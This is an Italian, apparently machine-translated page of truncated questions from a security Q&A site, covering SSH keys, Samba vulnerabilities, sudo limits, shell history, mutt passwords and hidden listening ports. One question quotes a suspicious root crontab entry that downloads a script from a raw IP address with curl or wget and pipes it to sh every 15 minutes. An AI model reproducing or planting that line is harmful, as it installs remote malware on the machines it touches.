I contenuti relativi alla sicurezza del computer, ad esempio contenuti relativi a politiche, meccanismi, ecc. Necessari, assicurano che i dati non vengano divulgati o danneggiati e che i servizi siano disponibili in tutte le circostanze.
Dovrei accedere a un server per collegare i server di gestione temporanea e live di un'azienda nel nostro ciclo di distribuzione. Un amministratore dalla loro parte ha impostato le due istanze e quindi ha creato un utente sul server per noi su SSH in as. Sono così abituato. Nella mia …
Secondo un articolo rapid7 ci sono alcune versioni vulnerabili di Samba che consentono l'esecuzione di codice in modalità remota su sistemi Linux: Mentre il ransomworm di WannaCry ha avuto un impatto sui sistemi Windows ed era facilmente identificabile, con chiari passaggi di riparazione, la vulnerabilità di Samba avrà un impatto …
La mia macchina è un server, quindi desidero ignorare le connessioni effettuate al mio server (ad es. Quando qualcuno visita il mio sito Web). Voglio vedere solo le connessioni / richieste fatte dal mio server in altri luoghi. Come vedo solo quelle connessioni in uscita? EDIT: sono nuovo a questo …
Ho notato qualche tempo fa che nomi utente e password dati curlcome argomenti della riga di comando non compaiono psnell'output (anche se ovviamente possono apparire nella tua cronologia di bash). Allo stesso modo non compaiono /proc/PID/cmdline. (Tuttavia, la lunghezza dell'argomento combinato nome utente / password può essere derivata). Dimostrazione di …
Stiamo riscontrando un piccolo problema su un server. Vogliamo che alcuni utenti siano in grado di fare ad es. sudoDiventare root, ma con la limitazione che l'utente non può cambiare la password di root. Cioè, una garanzia che possiamo ancora accedere a quel server e diventare root indipendentemente da ciò …
Esiste un modo per impedire che un comando venga aggiunto alla tua cronologia? Ho un comando che voglio tenere fuori dal mio file di cronologia e non mi interessa davvero averlo lì quando cerco la cronologia memorizzata in memoria, anche se questo è meno preoccupante. C'è un modo per impedirlo …
Attualmente lavoro in remoto per un certo numero di organizzazioni che hanno bisogno che io acceda regolarmente ai loro server per manutenzione e aggiornamenti. È sicuro aggiungere la mia chiave SSH pubblica RSA al .ssh/authorized_keysfile per consentirmi di accedere molto più velocemente / senza dover cercare le password? Opero presumendo …
Sto tentando di spostare alcune cartelle (come /vare /home) in una partizione separata dopo aver letto questa guida: 3.2.1 Scegliere uno schema di partizione intelligente Sono stato in grado di spostare con successo una cartella seguendo questa guida. Tuttavia, non sembra funzionare per più cartelle e tutte le mie cartelle …
Volevo aggiungere qualcosa al mio file crontab di root sul mio Raspberry Pi, e ho trovato una voce che mi sembra sospetta, cercando parti di esso su Google non ha trovato nulla. Voce Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh I …
Sto eseguendo Chromium in questo modo: chromium --no-sandbox Lo sto facendo perché sto eseguendo Debian Squeeze su un contenitore VM OpenVZ ed è l'unico modo per farlo funzionare. Anche se continuo a leggere questo è terribile . Ma voglio sapere perché esattamente. Qualcuno può spiegarmelo? Qualcuno deve hackerare il tuo …
Questa è più curiosità oziosa di ogni altra cosa. Un mio amico mi ha chiesto "quale intervallo di porte è che solo root può usare sotto Linux?" Gli ho detto che 0-1024 erano limitati. Poi mi ha chiesto perché fosse così e ... Ero in perdita. Nessuna idea. C'è un …
Il mio file .muttrc assomiglia a questo o vedi sotto uno sguardo. Sono titubante con la password. Come devo memorizzare la mia password per usarla mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your …
Ho generato e scaricato una .pemchiave privata da AWS. Tuttavia, per usare Putty per connettersi alla macchina virtuale, devo avere quella chiave in .ppkformato. Il processo di conversione è dettagliato in circa 20 righe qui: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Sto usando Linux Mint (una distribuzione Ubuntu) e so che posso usare puttygen nel …
Ho un albero di directory che vorrei distruggere con l'utilità 'shred' di Linux. Sfortunatamente, shred non ha -Rpossibilità di triturazione ricorsiva. Come posso distruggere un intero albero di directory in modo ricorsivo?
Ho un processo che ascolta 2 porte: 45136 / tcp e 37208 / udp (in realtà suppongo che sia lo stesso processo). Ma netstat non restituisce alcun pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Stesso risultato con "grep 37208". Ho provato anche lsof: lsof …
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.